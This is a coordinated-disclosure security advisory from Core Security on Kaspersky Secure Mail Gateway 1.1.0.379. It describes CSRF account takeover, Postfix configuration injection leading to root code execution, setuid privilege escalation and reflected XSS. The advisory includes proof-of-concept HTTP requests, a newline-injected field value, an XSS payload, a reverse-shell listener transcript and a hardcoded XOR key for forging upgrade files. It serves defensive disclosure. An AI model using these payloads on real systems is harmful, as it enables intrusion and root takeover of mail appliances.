Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Kaspersky Secure Mail Gateway Multiple Vulnerabilities 1. *Advisory Information* Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities Advisory ID: CORE-2017-0010 Advisory URL: http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities Date published: 2018-02-01 Date of last update: 2018-02-01 Vendors contacted: Kaspersky Lab Release mode: Coordinated release 2. *Vulnerability Information* Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of Special Elements in Output Used by a Downstream Component [CWE-74], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2, CVE-pending-assignment-3, CVE-pending-assignment-4 3. *Vulnerability Description* >From Kaspersky Labs website: Kaspersky Secure Mail Gateway [1] gives you a fully integrated email system; mail security solution - including anti-spam, anti-malware, anti-phishing and more - in a single virtual appliance. It's easy to install and manage - so you save time on day-to-day mail and mail security tasks, while we deliver award-winning security that helps you keep your business safe and boost user productivity. Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web Management Console. It is possible for a remote attacker to abuse these vulnerabilities and gain command execution as root. 4. *Vulnerable Packages* Kaspersky Secure Mail Gateway 1.1.0.379 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Kaspersky Labs published the following advisory . https://support.kaspersky.com/vulnerability.aspx?el=12430#010218 6. *Credits* These vulnerabilities were discovered and researched by Leandro Barragan from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Kaspersky Secure Mail Gateway is a virtual appliance designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to monitor the application status and manage its operation. This Management Console provides no cross-site request forgery protection site-wide, which could result in administrative account takeover as shown in 7.1. In addition, an attacker who manages to get access to the Web Console could gain command execution as root (7.2) by injecting arbitrary content into the appliance's Postfix configuration. It is also possible to elevate privileges from kluser to root (7.3) by abusing a setuid binary shipped with the appliance, which executes a script located on an attacker-controlled location with root privileges. Apart from this, a reflected cross-site scripting vulnerability (7.4) was found which affects the Management Console. 7.1. *Cross-site Request Forgery leading to Administrative account takeover* [CVE-pending-assignment-1] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The "Import Application Settings" feature is particularly interesting because it allows users to restore a backup file that overwrites the appliance's configuration. A settings backup file contains five zlib segments: /----- $ binwalk KSMG_settings.kz DECIMAL HEXADECIMAL DESCRIPTION ------------------------------------------------------------------------------ 16 0x10 Zlib compressed data, default compression 39 0x27 Zlib compressed data, default compression 2242 0x8C2 Zlib compressed data, default compression 2268 0x8DC Zlib compressed data, default compression 3072 0xC00 Zlib compressed data, default compression -----/ The last segment is a compressed backup of /var/opt/kaspersky/klms/db /passwd, which contains a list of usernames, passwords, and profiles, for example: /----- # cat /var/opt/kaspersky/klms/db/passwd Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin -----/ An attacker can craft a backup file that contains its own passwd file, and then submit it by abusing the CSRF vulnerability. The appliance then overwrites the original passwd file giving the attacker access to Administrator account. The following proof-of-concept request restores only account information in order to avoid changing appliance's current configuration. Please note that the file contents were removed to make it more readable. /----- POST /ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5 HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------3463969741915053213976213766 Content-Length: 3935 Referer: https://server/ksmg/ Cookie: SID=7362ED7771E7213F0EFCE85B430E240D Connection: close Upgrade-Insecure-Requests: 1 -----------------------------3463969741915053213976213766 Content-Disposition: form-data; name="data" {"importSections":{"importWebPasswords":true,"importMachineIndependent":false,"importMachineDependent":false,"machineDependent":{"importTraces":false,"importProxy":false,"importAuth":false,"importBackup":false,"backupImportSection":{"importFileStorage":false},"importScan":false,"scanImportSection":{"importFilterSocket":false},"importUpdater":false,"importQuarantine":false},"importRules":false,"importPersonal":false}} -----------------------------3463969741915053213976213766 Content-Disposition: form-data; name="fileContent"; filename="KSMG_settings.kz" Content-Type: application/octet-stream [...Tampered configuration file...] -----------------------------3463969741915053213976213766-- -----/ 7.2. *Configuration file injection leading to Code Execution as Root* [CVE-pending-assignment-2] Using the Web Management Console it is possible to add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file. By adding LF characters to this parameter, it is possible to inject a configuration parameter that would allow an attacker to execute arbitrary commands on the appliance as root. The following request injects arbitrary configuration settings into /etc/postfix/main.cf: /----- POST /ksmg/cgi-bin/klwi?action=setMtaSettings HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: https://server/ksmg/ Content-Length: 1541 Cookie: SID=7362ED7771E7213F0EFCE85B430E240D Connection: close data={"alwaysBcc":"test@xxxxxxxx\nmulti_instance_enable=yes\nmulti_instance_wrapper=\/tmp\/klms-appliance-upgrade\/upgrade.py\nmulti_instance_directories=\/tmp","mydomain":"localdomain",[...SNIPPED...] -----/ The resulting file looks as follows: /----- $ cat /etc/postfix/main.cf ... always_bcc = test@xxxxxxxx multi_instance_enable=yes multi_instance_wrapper=/tmp/klms-appliance-upgrade/upgrade.py multi_instance_directories=/tmp ... -----/ After that request is sent, postfix is automatically restarted, and the file pointed by multi_instance_wrapper is executed. In this proof- of-concept that parameter points to a python reverse shell: /----- $ nc -lvvvp 1080 Listening on [0.0.0.0] (family 0, port 1080) Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 42776) sh: no job control in this shell sh-4.1# id id uid=0(root) gid=497(klusers) groups=497(klusers),90(postdrop) -----/ Please note that while abusing this behavior would allow attackers to execute any binary on the system, no arguments can be passed to it. In order to overcome this we abused another Web Console functionality to upload a Python script to the file system. That procedure is described next. An attacker can write to /tmp/klms-appliance-upgrade/ using the Web Console using System Upgrade functionality. This feature takes an upgrade file (i.e. a KTGZ file), decodes it, and unpacks it on /tmp/klms-appliance-upgrade/. KTGZ files can be crafted by creating a TAR.GZ file with a malicious upgrade.py file inside it, and then XORing it with key 0xDF23B1ED. This key is static and hardcoded on system's binaries. When this file is uploaded using the Web Console, the upgrade process will fail, as it lacks Kaspersky signature files. However, the content of the rogue upgrade file (including the modified upgrade.py file used on this proof-of-concept) will remain on /tmp/klms-appliance-upgrade/. It is worth noting that file's permissions are conserved, so we can upload files with the executable bit set. 7.3. *Local Privilege Escalation* [CVE-pending-assignment-3] There is a setuid root binary located on /opt/kaspersky/klms-appliance/libexec/upgrade/: /----- $ ls -lha /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher -rws--x--- 1 root klusers 7,6K sep 24 2015 /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher -----/ This program looks for a python script once executed: /----- $ /opt/kaspersky/klms-appliance/libexec/upgrade/upgrade_launcher /usr/bin/python: can't open file '/tmp/klms-appliance-upgrade/upgrade.py': [Errno 2] No such file or directory -----/ /tmp/klms-appliance-upgrade/ directory is writeable by kluser by default. If an attacker manages to run commands on the appliance as kluser, s/he could abuse this behaviour to elevate privileges to root by writing a malicious script on the aforementioned path and running upgrade_launcher binary. 7.4. *Reflected Cross-Site Scripting* [CVE-pending-assignment-4] The callback parameter of the importSettings action method is vulnerable to cross-site scripting. /----- https://server/ksmg/cgi-bin/klwi?action=importSettings&callback=CC3262C5</script><script>alert(1)</script><script> -----/ 8. *Report Timeline* 2017-09-26: Core Security sent an initial notification to Kaspersky, including a draft advisory. 2017-09-27: Kaspersky answered saying there was nothing in attachment and requested the possibility of sending draft advisory as a password protected archive. 2017-09-29: Kaspersky asked again for the draft advisory. 2017-09-29: Core Security answered saying password protected archive is not possible and sent the advisory in text form (inside the mail). 2017-10-04: Kaspersky acknowledged the reception of the advisory and confirmed the vulnerabilities in the product. They said issues will be fixed 'till the end of November'. 2017-11-13: Kaspersky informed they had to postpone the release of the patch and won't make it to the end of November as originally proposed. They are asking to postpone the release to February 1st, 2018. 2017-11-13: Core Security answered acknowledging February 1st 2018 as the target publication date of the advisory and fix for the reported issues. 2018-01-16: Core Security asked final confirmation for February 1st as the target publication date and also the CVE-IDs for each one of the vulnerabilities found. 2018-01-18: Kaspersky confirmed February 1st as publication date. 2018-01-26: Core Security informed our advisory will be published February 1st at 12pm EST. 2018-01-30: Kaspersky informed they are waiting CVE-IDs from MITRE and that process might take a week long. Proposed postponing publication to February 8th. 2018-01-30: Core Security stated that postponing publication would not be possible and that the advisory will be published with pending CVE-IDs for each one of the vulnerabilities found until Kaspersky provides the final IDs. Also asked for a link to the fix to be included in the final advisory. 2018-01-30: Kaspersky sent the link for downloading latest KSMG version. 2018-01-30: Core Security acknowledged the information received. 2018-02-01: Advisory CORE-2017-0010 published. 9. *References* [1] https://www.kaspersky.com/small-to-medium-business-security/mail-security-appliance 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@xxxxxxxxxxxxxxxx 12. *Disclaimer* The contents of this advisory are copyright (c)2018 Core Security and (c)2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/